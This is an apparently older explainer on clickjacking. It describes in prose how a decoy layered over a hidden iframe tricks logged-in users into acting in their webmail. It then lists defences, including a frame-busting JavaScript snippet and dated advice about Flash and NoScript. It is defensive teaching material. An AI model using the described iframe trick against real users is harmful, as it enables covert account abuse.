ClickJacking

Think of ClickJacking like Phishing, but using web pages the way they were meant to be used. Broken down, it is nothing more than Dynamix HTML and CSS or just an iFrame. So because of this just disabling scripting within your web browser will not work; doing this may actually help cause it. Real world scenario: you log into a page like Yahoo; then you go to a site where they call an iFrame into Yahoo Mail. From there on top of the iFrame you would have something else, say a picture or game; acting like a cover over your email. You would click on it and underneath would lie the iFrame of your email that is being deleted, forwarded, ect. To see an example, go to http://www.planb-security.net/notclickjacking/iframetrick.html#really

NOTE* you will need to have a MySpace account that is set to private before doing this example.

So how can you stop this? Part if it is a Flash vulnerability, so make sure you are at least running Flash 10.x; to get the latest version go to http://get.adobe.com/flashplayer/. FireFox users are in luck, they are currently the only users that can be proactive at preventing this. By installing the No Script add on (https://addons.mozilla.org/en-US/firefox/addon/722) just make sure that clearclick on page is enabled for both trusted and untrusted pages. Your next option is to use a text based browser, as they have been shown not to be effected by ClickJacking.

Web Developers can try to prevent this by adding the following Java script to their index page only if it doesn't use iFrames:

<script language="Javascript">

if (top.location != self.location) {
top.location = self.location.href
}

</script>

Of course, the person using this exploit more than likely knows how to disable javascript with the iFrame tag.

As usual following best security practices is probably the best way to prevent this exploit; by going to sites you know you can trust and sign out of pages you sign into.